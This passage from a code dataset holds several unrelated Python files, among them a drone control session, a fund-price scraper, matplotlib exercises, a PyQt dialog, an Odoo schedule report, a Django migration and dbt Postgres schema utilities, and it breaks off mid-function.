# set up publications to trigger on attribute change, immediately publish an event\n vehicle.add_attribute_listener('mode', self.publish_mode)\n self.publish_mode(None, None, vehicle.mode)\n\n vehicle.add_attribute_listener('gps_0.satellites_visible', self.publish_satellites)\n self.publish_satellites(None, None, vehicle.gps_0)\n\n vehicle.add_attribute_listener('location.global_relative_frame', self.publish_altitude)\n self.publish_altitude(None, None, vehicle.location.global_relative_frame)\n\n vehicle.add_attribute_listener('armed', self.publish_armed)\n self.publish_armed(None, None, vehicle.armed)\n\n # if connection fails, try again in 5 seconds\n except socket_error as e:\n self.log.info(\"could not connect to pixhawk (errno {}), trying again\".format(e.errno))\n # register RPCs\n yield self.register(self.set_translate, u'com.quadcopter.set_translate')\n yield self.register(self.set_mode, u'com.quadcopter.set_mode')\n yield self.register(self.set_armed, u'com.quadcopter.set_armed')\n yield self.register(self.set_takeoff, u'com.quadcopter.set_takeoff')\n yield self.register(self.set_altitude, u'com.quadcopter.set_altitude')\n yield self.register(self.set_altitude_relative, u'com.quadcopter.set_altitude_relative')\n\n def onClose(self, *args):\n # remove attribute listeners\n vehicle.remove_attribute_listener('mode', self.publish_mode)\n vehicle.remove_attribute_listener('gps_0.satellites_visible', self.publish_satellites)\n vehicle.remove_attribute_listener('location.global_relative_frame', self.publish_altitude)\n vehicle.remove_attribute_listener('armed', self.publish_armed)\n log.observer.removeObserver(self.publish_messages)\n\nfrom autobahn.twisted.wamp import ApplicationRunner\n\n# runner = ApplicationRunner(url=u\"ws://localhost:8080/ws\", realm=u\"realm1\", retry_delay_growth=10, initial_retry_delay=5, max_retries=-1, retry_delay_jitter=2)\nrunner = ApplicationRunner(url=u\"ws://localhost:8080/ws\", realm=u\"realm1\")\nrunner.run(QuadcopterSession, auto_reconnect=True)\n","sub_path":"controls/vehicle/wamp.py","file_name":"wamp.py","file_ext":"py","file_size_in_byte":7990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"492520819","text":"##!/bin/python2.7\n#########################################\n##Import needed libraries\n#########################################\nimport time #To be able to sleep\nimport requests\nfrom bs4 import BeautifulSoup\nfrom datetime import datetime\nimport codecs #To be able to write the file\nfrom local_paths import output\nfrom local_paths import output_error\nfrom local_paths import input\n\n\n#########################################\n##Static paths and variables\n#########################################\nstatic1 = \"https://secust.msse.se/se/nordnetny/funds/overview.aspx?cid=\"\nstatic2 = \"&cntry=SE\"\nvDate = datetime.now().strftime(\"%Y-%m-%d\")\n\n\n#########################################\n## Create empty file so we can write to it later\n#########################################\nNordnet_Nav = codecs.open(output + '/' + 'Nav' + vDate + '.txt', 'w', 'utf-8')\ntexttowrite = 'ID@NAV@NAVDATE'\nNordnet_Nav.write(texttowrite + '\\r\\n')\n\n#########################################\n# Funds with errors\n#########################################\nErrorID = codecs.open(output_error + '/' + 'Error' + vDate + '.txt', 'w', 'utf-8')\ntexttowrite = 'ID@ERROR'\nErrorID.write(texttowrite + '\\r\\n')\n\n\n#########################################\n## Get IDs to read\n#########################################\nwith codecs.open(input + '/' + 'ID.txt', 'r', encoding='utf-8') as Funds:\n\tfor Fund in Funds:\n\t\tFund2 = Fund.strip()\n\t\tres = requests.get(static1 + Fund2 + static2)\n\t\ttry:\n\t\t\tsoup = BeautifulSoup(res.content, 'lxml')\n\t\t\ttable = soup.find('table', {\"id\" : \"Table1\"})\n\t\t\tNav = table.find_all('td')[3].text\n\t\t\tPreNavDate = table.find_all('td')[5].text\n\t\t\tNavDate = PreNavDate.strip()\n################################################\n## Write to file\n################################################\n\t\t\tNordnet_Nav.write(\"%s\" %Fund2 + \"@\" + \"%s\" %Nav + \"@\" \"%s\" %NavDate + '\\r\\n')\n\t\texcept Exception as e:\n\t\t\tErrorID.write(\"%s\" % x_stripped + \"@\" + \"%s\" % str(e) + '\\r\\n')\n","sub_path":"Nordnet_GetNav_BS.py","file_name":"Nordnet_GetNav_BS.py","file_ext":"py","file_size_in_byte":1942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"61093540","text":"import numpy as np\r\nimport sys\r\nimport matplotlib.pyplot as plt\r\n\r\n#Plot curve\r\nx = np.linspace(0,4*np.pi,100)\r\ny = np.sin(x)\r\nplt.plot(x,y)\r\nplt.show()\r\n\r\n#Marker\r\n# x = np.linspace(0,4*np.pi,100)\r\n# y = np.sin(x)\r\n# plt.plot(x,y)\r\n# plt.plot(x,y,'-^') # adding triangle markers\r\n# plt.plot(x,y,'-o') # adding circle markers\r\n# plt.show()\r\n\r\n\r\n#Line Style\r\n# x = np.linspace(0,4*np.pi,100)\r\n# y = np.sin(x)\r\n# plt.plot(x,y,'--')\r\n# plt.show()\r\n\r\n#color\r\n# x = np.linspace(0,4*np.pi,100)\r\n# y = np.sin(x)\r\n# plt.plot(x,y,'g')\r\n# plt.show()\r\n\r\n#grid line\r\nx = np.linspace(0,4*np.pi,100)\r\ny = np.sin(x)\r\nplt.plot(x,y,'g')\r\nplt.grid()\r\nplt.show()\r\n\r\n#label\r\n# x = np.linspace(0,4*np.pi,100)\r\n# y = np.sin(x)\r\n# plt.plot(x,y,'g')\r\n# plt.xlabel('x')\r\n# plt.ylabel('y')\r\n# plt.title('A sine curve')\r\n# plt.axis([0,4*np.pi,-2,2])\r\n# plt.show()\r\n\r\n\r\n#Overlay Plots and Legend\r\n# x = np.linspace(0,4*np.pi,100)\r\n# y = np.sin(x)\r\n# y1= np.cos(x)\r\n# plt.plot(x,y,'c',label='y=sin(x)')\r\n# plt.plot(x,y1,'y',label='y=cos(x)')\r\n# plt.legend(loc='upper left')\r\n# plt.show()\r\n\r\n\r\n\r\n#subplot\r\n# x = np.linspace(0,4*np.pi,100)\r\n# y = np.sin(x)\r\n# y1= np.cos(x)\r\n# plt.subplot(2,1,1)\r\n# plt.plot(x,y,'c',label='y=sin(x)')\r\n# plt.legend(loc='upper left')\r\n# plt.subplot(2,1,2)\r\n# plt.plot(x,y1,'y',label='y=cos(x)')\r\n# plt.legend(loc='upper left')\r\n# plt.show()\r\n\r\n#-------------------------------\r\n#chanllenge\r\n\r\n# x = np.linspace(0,4*np.pi,100)\r\n# y = np.sin(x)\r\n# y2 = np.cos(x)\r\n# y3 = np.sin(x) * np.cos(x)\r\n# y4 = np.sin(x)- np.cos(x)\r\n\r\n# plt.subplot(2,2,1)\r\n# plt.plot(x,y,'r',label='y=sin(x)')\r\n# plt.legend(loc='upper left')\r\n# plt.subplot(2,2,2)\r\n# plt.plot(x,y2,'y',label='y=cos(x)')\r\n# plt.legend(loc='upper left')\r\n# plt.subplot(2,2,3)\r\n# plt.plot(x,y3,'g',label='y=sin(x) * cos(x)')\r\n# plt.legend(loc='upper left')\r\n# plt.subplot(2,2,4)\r\n# plt.plot(x,y4,'b',label='y=cos(x) - sin(x)')\r\n# plt.legend(loc='upper left')\r\n# plt.subplots_adjust(wspace=0.6, hspace=0.6, left=0.1, bottom=0.22, right=0.96, top=0.96)\r\n# plt.show()\r\n\r\n#---------------------------------\r\n# x = np.linspace(0,4*np.pi,100)\r\n# y = np.sin(x)\r\n# y2 = np.cos(x)\r\n# y3 = np.sin(x) * np.cos(x)\r\n# y4 = np.sin(x)- np.cos(x)\r\n\r\n# plt.subplot(2,2,1)\r\n# plt.plot(x,y,'r')\r\n# plt.subplot(2,2,2)\r\n# plt.plot(x,y2,'y')\r\n# plt.subplot(2,2,3)\r\n# plt.plot(x,y3,'g')\r\n# plt.subplot(2,2,4)\r\n# plt.plot(x,y4,'b')\r\n\r\n# plt.legend(loc='upper left')\r\n# plt.show()\r\n\r\n\r\n\r\n#-----------------------------------------------------\r\n#Examples\r\n# def plot5():\r\n# data = [ (1, 0), (2, 0.1 ), (3, 1.1), (4, 1.2), (5, 2.3), \r\n# (6, 3.5), (7, 5.8) ]\r\n# X = [ x for (x,y) in data ]\r\n# Y = [ y for (x,y) in data ]\r\n# #print X\r\n# #print Y\r\n# plt.plot( X, Y, ':rs' )\r\n# plt.axis( [0, 8, 0, 6])\r\n# plt.xlabel( \"X values\" )\r\n# plt.ylabel( \"Y values\" )\r\n# plt.show()\r\n\r\n# plot5()\r\n\r\n\r\n#------------------------------------------------------\r\n# #Scatter Plot\r\n# x = np.arange(1, 51)\r\n# print(x)\r\n# y = np.random.rand(50) \r\n# print(y)\r\n\r\n# plt.scatter(x,y)\r\n# plt.show()\r\n#--------------------------------------------------\r\n#Bar Plot\r\ndata = [ (\"data1\", 34), (\"data2\", 22),\r\n (\"data3\", 11), ( \"data4\", 28),\r\n (\"data5\", 57), ( \"data6\", 39),\r\n (\"data7\", 23), ( \"data8\", 98)]\r\nN = len( data )\r\nx = np.arange(1, N+1)\r\ny = [ num for (s, num) in data ]\r\nlabels = [ s for (s, num) in data ]\r\nwidth = 1\r\nbar1 = plt.bar( x, y, width, color=\"y\" )\r\nplt.ylabel( 'Intensity' )\r\nplt.xticks(x + width/2.0, labels )\r\nplt.show()\r\n\r\n#------------------------------------------\r\n#Contour Plot\r\n# x = np.linspace(-1,1,255)\r\n# y = np.linspace(-2,2,300)\r\n# X, Y = np.meshgrid(x, y)\r\n# z = np.sin(X)*np.cos(Y)\r\n# plt.contour(X,Y,z,255)\r\n# plt.show()\r\n#-------------------------------------\r\n\r\n#Hisotgram\r\n# import matplotlib.pyplot as plt\r\n# import numpy as np\r\n# gaussian_numbers = np.random.normal(size=10000)\r\n# print(gaussian_numbers)\r\n# plt.hist(gaussian_numbers)\r\n# plt.title(\"Gaussian Histogram\")\r\n# plt.xlabel(\"Value\")\r\n# plt.ylabel(\"Frequency\")\r\n# plt.show()\r\n\r\n\r\n#----------------------------------------------\r\n# #Pie chart\r\n# print (sys.version)\r\n# x = np.linspace(0,4*np.pi,10)\r\n# plt.pie(x)\r\n# plt.show()","sub_path":"Examples -Students/Module12-Numpy/matplotlibEx.py","file_name":"matplotlibEx.py","file_ext":"py","file_size_in_byte":4198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"277728623","text":"import numpy as np\nfrom ploos import checkableComboBox\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtWidgets import *\n\n\nclass Ui_Dialog(object):\n def setupUi(self, Dialog, canvas):\n self.canvas = canvas\n self.doscar = canvas.doscar[0]\n self.axn = 0\n self.linecounter = 0\n if not Dialog.objectName():\n Dialog.setObjectName(u\"Projector\")\n Dialog.resize(402, 368)\n self.horizontalLayout_3 = QHBoxLayout(Dialog)\n self.horizontalLayout_3.setObjectName(u\"horizontalLayout_3\")\n self.verticalLayout_2 = QVBoxLayout()\n self.verticalLayout_2.setObjectName(u\"verticalLayout_2\")\n self.verticalLayout_2.setSizeConstraint(QLayout.SetMaximumSize)\n self.label_ax = QLabel(Dialog)\n self.label_ax.setObjectName(u\"label_ax\")\n self.verticalLayout_2.addWidget(self.label_ax)\n self.horizontalLayout = QHBoxLayout()\n self.horizontalLayout.setObjectName(u\"horizontalLayout\")\n self.label = QLabel(Dialog)\n self.label.setObjectName(u\"label\")\n\n self.horizontalLayout.addWidget(self.label)\n\n# self.spinBox = QSpinBox(Dialog)\n# self.spinBox.setObjectName(u\"spinBox\")\n# self.spinBox.setRange(1, doscar.natoms)\n#\n# self.horizontalLayout.addWidget(self.spinBox)\n#\n# self.horizontalSpacer = QSpacerItem(60, 40, QSizePolicy.Preferred, QSizePolicy.Minimum)\n#\n# self.horizontalLayout.addItem(self.horizontalSpacer)\n#\n# self.label_2 = QLabel(Dialog)\n# self.label_2.setObjectName(u\"label_2\")\n#\n# self.horizontalLayout.addWidget(self.label_2)\n#\n# self.spinBox_2 = QSpinBox(Dialog)\n# self.spinBox_2.setObjectName(u\"spinBox_2\")\n# self.spinBox_2.setRange(1, doscar.natoms)\n#\n# self.horizontalLayout.addWidget(self.spinBox_2)\n\n\n# self.verticalLayout_2.addLayout(self.horizontalLayout)\n self.axis = checkableComboBox.CheckableComboBox(Dialog) \n if canvas.compare:\n self.axis.addItems( [ str(i) for i,x in enumerate(canvas.axes) ] )\n self.verticalLayout_2.addWidget(self.axis)\n self.loadDoscar = QPushButton(Dialog)\n self.loadDoscar.setObjectName(u\"loadDoscar\")\n self.loadDoscar.clicked.connect(self.load)\n self.verticalLayout_2.addWidget(self.loadDoscar)\n\n self.label_3 = QLabel(Dialog)\n self.label_3.setObjectName(u\"label_3\")\n self.verticalLayout_2.addWidget(self.label_3)\n self.atoms = checkableComboBox.CheckableComboBox(Dialog) \n self.atoms.addItems( self.doscar.atoms )\n\n self.verticalLayout_2.addWidget(self.atoms)\n \n self.label_4 = QLabel(Dialog)\n self.label_4.setObjectName(u\"label_4\")\n\n self.verticalLayout_2.addWidget(self.label_4)\n\n self.orbitals = checkableComboBox.CheckableComboBox(Dialog) \n self.orbitals.addItems( self.doscar.guiLabel )\n\n self.verticalLayout_2.addWidget(self.orbitals)\n \n self.label_5 = QLabel(Dialog)\n self.label_5.setObjectName(u\"label_5\")\n\n self.verticalLayout_2.addWidget(self.label_5)\n\n self.lineEdit = QLineEdit(Dialog)\n self.lineEdit.setObjectName(u\"lineEdit\")\n\n self.verticalLayout_2.addWidget(self.lineEdit)\n\n self.verticalSpacer = QSpacerItem(20, 40, QSizePolicy.Minimum, QSizePolicy.Expanding)\n\n self.verticalLayout_2.addItem(self.verticalSpacer)\n\n self.horizontalLayout_2 = QHBoxLayout()\n self.horizontalLayout_2.setObjectName(u\"horizontalLayout_2\")\n self.pushButton = QPushButton(Dialog)\n self.pushButton.setObjectName(u\"pushButton\")\n self.pushButton.clicked.connect(self.clickAddLine)\n\n self.horizontalLayout_2.addWidget(self.pushButton)\n\n# self.pushButton_2 = QPushButton(Dialog)\n# self.pushButton_2.setObjectName(u\"pushButton_2\")\n# self.pushButton_2.clicked.connect(self.clickRemoveLine)\n#\n# self.horizontalLayout_2.addWidget(self.pushButton_2)\n\n self.pushButton_3 = QPushButton(Dialog)\n self.pushButton_3.setObjectName(u\"pushButton_3\")\n self.pushButton_3.clicked.connect(self.close)\n\n self.horizontalLayout_2.addWidget(self.pushButton_3)\n\n\n self.verticalLayout_2.addLayout(self.horizontalLayout_2)\n\n\n self.horizontalLayout_3.addLayout(self.verticalLayout_2)\n\n\n self.retranslateUi(Dialog)\n\n QMetaObject.connectSlotsByName(Dialog)\n # setupUi\n\n def retranslateUi(self, Dialog):\n Dialog.setWindowTitle(QCoreApplication.translate(\"Projector\", u\"Projector\", None))\n self.label_ax.setText(QCoreApplication.translate(\"Dialog\", u\"Choose axis:\", None))\n self.label_3.setText(QCoreApplication.translate(\"Dialog\", u\"Project onto atoms:\", None))\n# self.label.setText(QCoreApplication.translate(\"Dialog\", u\"from:\", None))\n# self.label_2.setText(QCoreApplication.translate(\"Dialog\", u\"to:\", None))\n self.label_4.setText(QCoreApplication.translate(\"Dialog\", u\"Project onto orbitals\", None))\n self.label_5.setText(QCoreApplication.translate(\"Dialog\", u\"Line label:\", None))\n self.loadDoscar.setText(QCoreApplication.translate(\"Dialog\", \n u\"Load DOSCAR\", None))\n self.pushButton.setText(QCoreApplication.translate(\"Dialog\", u\"Add line\", None))\n# self.pushButton_2.setText(QCoreApplication.translate(\"Dialog\", u\"Remove line\", None))\n self.pushButton_3.setText(QCoreApplication.translate(\"Dialog\", u\"Close\", None))\n # retranslateUi\n\n\n def clickAddLine(self):\n self.linecounter += 1\n# atomlist = np.arange( self.spinBox.value()-1, self.spinBox_2.value() )\n atomlist = self.atoms.currentData()\n orblist = self.orbitals.currentData()\n mylabel = self.lineEdit.text()\n color = self.canvas.colors[self.linecounter]\n \n lines = []\n for axis in self.canvas.axes.flatten():\n for line in axis.get_lines():\n lines.append( line )\n for line in lines:\n if line.get_label() == mylabel:\n color = line.get_color()\n break\n\n self.canvas.axes[self.axn].plot(self.doscar.energy, self.doscar.projector(atomlist, orblist), \n color=color, label=mylabel)\n# self.canvas.axes[self.axn].legend(loc='best', prop={'size' : 20})\n# self.canvas.legend = self.canvas.fig.legend(loc='upper right',\n# prop={'size':20})\n self.canvas.draw()\n self.lineEdit.clear()\n\n\n def load(self):\n self.axn = int(self.axis.currentData()[0])\n self.doscar = self.canvas.doscar[ self.axn ]\n# def clickRemoveLine(self):\n# if ( self.linecounter > 0 ):\n# self.canvas.axes.get_legend().remove()\n# self.canvas.axes.lines.pop(self.linecounter)\n# self.canvas.axes.legend(loc='best')\n# self.canvas.draw()\n# self.linecounter -= 1\n\n\nclass AppProj(QDialog, Ui_Dialog):\n def __init__(self, canvas, parent=None):\n super(AppProj, self).__init__(parent)\n for dd in canvas.doscar: \n if dd.enableProjector: self.setupUi(self, canvas)\n break\n\n\n","sub_path":"ploos/ProjectorGUI.py","file_name":"ProjectorGUI.py","file_ext":"py","file_size_in_byte":7184,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"274305277","text":"import re\nimport json\n\nfrom database.lockstatus import LockStatus\n\n\nclass Update:\n\n def strip_text(self,text):\n return re.sub(' +', ' ', text.strip())\n\n def update_row(self, username,dbname,query,logger,fname):\n check_lock = LockStatus().checklock(username)\n # create db copy\n src_fname = dbname + \"_Tables.txt\"\n dest_dname = dbname + \"_Tables_copy.txt\"\n if fname is None:\n filename = src_fname\n status = False\n else:\n filename = dest_dname\n status = True\n file1 = open(filename, \"r\")\n f1 = file1.read()\n file1.close()\n update_set_dict = {}\n dict_obj = json.loads(f1)\n is_update_query = False\n # query = \"UPDATE Player SET player_name = 'ABC', position = 'forward' WHERE team_id = '1';\"\n if re.split(\" \", query)[0].lower() == \"update\":\n is_update_query = True\n\n if is_update_query:\n # do operation\n update_query_set_values = re.split(\",\",\n re.sub(\"[^A-Za-z0-9=,_]\", \" \",\n re.findall(r'set(.*?)where', query.lower())[0]))\n update_query_condition = re.split(\",\", re.sub(\"[^A-Za-z0-9=,_]\", \" \", re.split('where', query.lower())[1]))\n table_name = self.strip_text(re.findall(r'update(.*?)set', query.lower())[0].strip())\n\n for y in update_query_condition:\n list_condition_update = re.split(\"= |< |> |<= |>= \", y)\n key_to_search_for_update_condition = self.strip_text(list_condition_update[0])\n value_update_condition = self.strip_text(list_condition_update[1])\n\n for x in update_query_set_values:\n list_key_value_update = re.split(\"=\", x)\n key_to_search = self.strip_text(list_key_value_update[0])\n value_to_update = self.strip_text(list_key_value_update[1])\n update_set_dict[key_to_search] = value_to_update\n # search in dict for condition and perform updates\n\n print(\"Update Query Operation\")\n #print(update_set_dict)\n tables_info = dict_obj['Tables']\n #print(tables_info)\n for values in tables_info:\n if values.get(\"Table_name\") == table_name:\n print(\"found\")\n values_info = values['Table_columns']\n for inside_list_value in values_info:\n if inside_list_value.get(key_to_search_for_update_condition) == value_update_condition:\n #print(inside_list_value)\n inside_list_value.update(update_set_dict)\n\n #print(dict_obj)\n #print(values)\n #print('check')\n file1 = open(filename, \"w+\")\n f1 = file1.write(json.dumps(dict_obj))\n file1.close()\n return status","sub_path":"database/update.py","file_name":"update.py","file_ext":"py","file_size_in_byte":2986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"454002212","text":"# -*- coding: utf-8 -*-\nfrom datetime import datetime, timedelta\nfrom odoo import api, fields, models\nimport datetime\nclass ScheduleReport(models.AbstractModel):\n _name = 'report.jptip_core.class_list.xlsx'\n _inherit = 'report.report_xlsx.abstract'\n\n def generate_xlsx_report(self,workbook, data, env):\n time_interval = self.env['class_schedule.print'].search([('company_id', '=', self.env.user.company_id.id)],limit=1)\n start_date = time_interval.start_date\n end_date = time_interval.end_date\n class_data = self.env['class.timetable'].search([('date', '>=', start_date), ('date', '<=', end_date), ('company_id', '=', self.env.user.company_id.id)], order=\"class_name asc\")\n class_room = self.env['jptip.class.room'].search([('company_id','=',self.env.user.company_id.id)])\n format21 = workbook.add_format({'font_size': 10, 'align': 'center', 'text_wrap': 1, 'bold': True, 'top':1, 'left':1, 'right':1,'bottom':1})\n format22 = workbook.add_format({'font_size': 8, 'align': 'center', 'text_wrap': 1})\n format23 = workbook.add_format({'font_size': 12, 'align': 'vcenter', 'text_wrap': 1})\n format24 = workbook.add_format({'font_size': 10, 'align': 'center', 'text_wrap': 1, 'bold': True, 'top':2, 'left':2, 'right':2,'bottom':2})\n format23.set_align('center')\n format24.set_bg_color('gray')\n sheet = workbook.add_worksheet(u'%s 課表' % self.env.user.company_id.name[0:2])\n start_day = None\n end_day = None\n for line in class_data.sorted(key=lambda r: r.date, reverse=False):\n start_day = line.date\n break\n for line in class_data.sorted(key=lambda r: r.date, reverse=True):\n end_day = line.date\n break\n days = datetime.datetime.strptime(end_day, '%Y-%m-%d') - datetime.datetime.strptime(start_day, '%Y-%m-%d')\n delta = datetime.timedelta(days=1)\n j = 0\n for line in range(0, days.days + 1):\n class_data_set = self.env['class.timetable'].search([('date', '=', start_day), ('company_id', '=', self.env.user.company_id.id)])\n if not class_data_set:\n continue\n i = 2\n sheet.merge_range(j, 0, j, len(class_room) + 1, '%s 教室班課表' % self.env.user.company_id.class_header, format21)\n j += 1\n sheet.write(j, i - 2, '日期', format24)\n sheet.write(j, i - 1, '時間', format24)\n for row in class_room.sorted(key=lambda r: r.name, reverse=False):\n sheet.write(j, i, row.name, format24)\n row.excel_location = i\n i += 1\n j += 1\n temp = j\n if datetime.datetime.strptime(start_day, '%Y-%m-%d').weekday() != 5 and datetime.datetime.strptime(start_day, '%Y-%m-%d').weekday() != 6:\n time_session = self.env['jt.time.session'].search([('SA_day','!=','1'),('SU_day','!=','1'),('company_id','=',self.env.user.company_id.id)])\n for row in time_session:\n for x in row.time_duration_ids:\n sheet.write(j,1, x.begin_time + '\\n' + ' ~ \\n' + x.end_time, format21)\n for y in class_data_set:\n if y.class_time_begin.begin_time == x.begin_time and y.class_time_begin.end_time == x.end_time:\n sheet.write(j, y.class_room.excel_location, y.class_name.course_id.name + '\\n' + y.course_seq + '\\n' + y.teacher.name if y.teacher else y.class_name.course_id.name + '\\n' + y.course_seq + '\\n', format22)\n j += 1\n sheet.merge_range(temp, 0, j - 1, 0, str(datetime.datetime.strptime(start_day, '%Y-%m-%d').month) + '/' + str(datetime.datetime.strptime(start_day, '%Y-%m-%d').day), format23)\n start_day = str(datetime.datetime.strptime(start_day, '%Y-%m-%d') + delta).replace(' 00:00:00', '')\n if datetime.datetime.strptime(start_day, '%Y-%m-%d').weekday() == 5 or datetime.datetime.strptime(start_day, '%Y-%m-%d').weekday() == 6:\n time_session = self.env['jt.time.session'].search([('SA_day','=','1'),('SU_day','=','1'),('company_id','=',self.env.user.company_id.id)])\n for row in time_session:\n for x in row.time_duration_ids:\n sheet.write(j,1, x.begin_time + '\\n' + ' ~ \\n' + x.end_time, format21)\n for y in class_data_set:\n if y.class_time_begin.begin_time == x.begin_time and y.class_time_begin.end_time == x.end_time:\n sheet.write(j, y.class_room.excel_location, y.class_name.course_id.name + '\\n' + y.course_seq + '\\n' + y.teacher.name if y.teacher else y.class_name.course_id.name + '\\n' + y.course_seq + '\\n', format22)\n j += 1\n sheet.merge_range(temp, 0, j - 1, 0, str(datetime.datetime.strptime(start_day, '%Y-%m-%d').month) + '/' + str(datetime.datetime.strptime(start_day, '%Y-%m-%d').day), format23)\n start_day = str(datetime.datetime.strptime(start_day, '%Y-%m-%d') + delta).replace(' 00:00:00', '')\n time_interval.unlink()","sub_path":"addons_jptip/jptip_core/report/class_schedule_report.py","file_name":"class_schedule_report.py","file_ext":"py","file_size_in_byte":5209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"427887932","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('track', '0002_auto_20140910_1824'),\n ]\n\n operations = [\n migrations.RemoveField(\n model_name='track',\n name='file',\n ),\n migrations.AddField(\n model_name='track',\n name='album',\n field=models.ForeignKey(default=1, to='track.Album'),\n preserve_default=False,\n ),\n migrations.AlterField(\n model_name='album',\n name='artist',\n field=models.ForeignKey(to='users.UserProxy'),\n ),\n ]\n","sub_path":"musicsite/track/migrations/0003_auto_20140913_1302.py","file_name":"0003_auto_20140913_1302.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"419444864","text":"\nfrom dbt.logger import GLOBAL_LOGGER as logger\n\nimport psycopg2\nimport logging\nimport time\nimport re\n\nSCHEMA_PERMISSION_DENIED_MESSAGE = \"\"\"\nThe user '{user}' does not have sufficient permissions to create the schema\n'{schema}'. Either create the schema manually, or adjust the permissions of\nthe '{user}' user.\"\"\"\n\nRELATION_PERMISSION_DENIED_MESSAGE = \"\"\"\nThe user '{user}' does not have sufficient permissions to create the model\n'{model}' in the schema '{schema}'. Please adjust the permissions of the\n'{user}' user on the '{schema}' schema. With a superuser account, execute the\nfollowing commands, then re-run dbt.\n\ngrant usage, create on schema \"{schema}\" to \"{user}\";\ngrant select, insert, delete on all tables in schema \"{schema}\" to \"{user}\";\"\"\"\n\nRELATION_NOT_OWNER_MESSAGE = \"\"\"\nThe user '{user}' does not have sufficient permissions to drop the model\n'{model}' in the schema '{schema}'. This is likely because the relation was\ncreated by a different user. Either delete the model \"{schema}\".\"{model}\"\nmanually, or adjust the permissions of the '{user}' user in the '{schema}'\nschema.\"\"\"\n\nREAD_PERMISSION_DENIED_ERROR = \"\"\"\nEncountered an error while executing model '{model}'.\n> {error}\nCheck that the user '{user}' has sufficient permissions to read from all\nnecessary source tables\"\"\"\n\n\nclass Column(object):\n def __init__(self, column, dtype, char_size):\n self.column = column\n self.dtype = dtype\n self.char_size = char_size\n\n @property\n def name(self):\n return self.column\n\n @property\n def quoted(self):\n return '\"{}\"'.format(self.column)\n\n @property\n def data_type(self):\n if self.is_string():\n return Column.string_type(self.string_size())\n else:\n return self.dtype\n\n def is_string(self):\n return self.dtype in ['text', 'character varying']\n\n def string_size(self):\n if not self.is_string():\n raise RuntimeError(\"Called string_size() on non-string field!\")\n\n if self.dtype == 'text' or self.char_size is None:\n # char_size should never be None. Handle it reasonably just in case\n return 255\n else:\n return int(self.char_size)\n\n def can_expand_to(self, other_column):\n \"\"\"returns True if this column can be expanded to the size of the\n other column\"\"\"\n if not self.is_string() or not other_column.is_string():\n return False\n\n return other_column.string_size() > self.string_size()\n\n @classmethod\n def string_type(cls, size):\n return \"character varying({})\".format(size)\n\n def __repr__(self):\n return \"\".format(self.name, self.data_type)\n\n\nclass Schema(object):\n def __init__(self, project, target):\n self.project = project\n self.target = target\n\n self.schema_cache = {}\n self.runtime_existing = self.query_for_existing(self.target.schema)\n\n def cache_table_columns(self, schema, table, columns):\n tid = (schema, table)\n\n if tid not in self.schema_cache:\n self.schema_cache[tid] = columns\n\n return tid\n\n def get_table_columns_if_cached(self, schema, table):\n tid = (schema, table)\n return self.schema_cache.get(tid, None)\n\n def get_schemas(self):\n existing = []\n results = self.execute_and_fetch(\n 'select nspname from pg_catalog.pg_namespace')\n return [name for (name,) in results]\n\n def create_schema(self, schema_name):\n target_cfg = self.project.run_environment()\n user = target_cfg['user']\n\n try:\n self.execute(\n 'create schema if not exists \"{}\"'.format(schema_name))\n except psycopg2.ProgrammingError as e:\n if \"permission denied for\" in e.diag.message_primary:\n raise RuntimeError(\n SCHEMA_PERMISSION_DENIED_MESSAGE.format(\n schema=schema_name, user=user))\n else:\n raise e\n\n def query_for_existing(self, schema):\n sql = \"\"\"\n select tablename as name, 'table' as type from pg_tables where schemaname = '{schema}'\n union all\n select viewname as name, 'view' as type from pg_views where schemaname = '{schema}' \"\"\".format(schema=schema) # noqa\n\n results = self.execute_and_fetch(sql)\n existing = [(name, relation_type) for (name, relation_type) in results]\n\n return dict(existing)\n\n def execute(self, sql):\n with self.target.get_handle() as handle:\n with handle.cursor() as cursor:\n try:\n logger.debug(\"SQL: %s\", sql)\n pre = time.time()\n cursor.execute(sql)\n post = time.time()\n logger.debug(\n \"SQL status: %s in %0.2f seconds\",\n cursor.statusmessage, post-pre)\n return cursor.statusmessage\n except Exception as e:\n self.target.rollback()\n logger.debug(\"Error running SQL: %s\", sql)\n logger.debug(\"rolling back connection\")\n raise e\n\n def execute_and_fetch(self, sql):\n with self.target.get_handle() as handle:\n with handle.cursor() as cursor:\n try:\n logger.debug(\"SQL: %s\", sql)\n pre = time.time()\n cursor.execute(sql)\n post = time.time()\n logger.debug(\n \"SQL status: %s in %0.2f seconds\",\n cursor.statusmessage, post-pre)\n data = cursor.fetchall()\n logger.debug(\"SQL response: %s\", data)\n return data\n except Exception as e:\n self.target.rollback()\n logger.debug(\"Error running SQL: %s\", sql)\n logger.debug(\"rolling back connection\")\n raise e\n\n def execute_and_handle_permissions(self, query, model_name):\n try:\n return self.execute(query)\n except psycopg2.ProgrammingError as e:\n error_data = {\"model\": model_name,\n \"schema\": self.target.schema,\n \"user\": self.target.user}\n if 'must be owner of relation' in e.diag.message_primary:\n raise RuntimeError(\n RELATION_NOT_OWNER_MESSAGE.format(**error_data))\n elif \"permission denied for\" in e.diag.message_primary:\n raise RuntimeError(\n RELATION_PERMISSION_DENIED_MESSAGE.format(**error_data))\n else:\n raise e\n\n def execute_without_auto_commit(self, sql, handle=None):\n if handle is None:\n handle = self.target.get_handle()\n\n cursor = handle.cursor()\n\n try:\n logger.debug(\"SQL: %s\", sql)\n pre = time.time()\n cursor.execute(sql)\n post = time.time()\n logger.debug(\n \"SQL status: %s in %0.2f seconds\",\n cursor.statusmessage, post-pre)\n return handle, cursor.statusmessage\n except Exception as e:\n self.target.rollback()\n logger.debug(\"Error running SQL: %s\", sql)\n logger.debug(\"rolling back 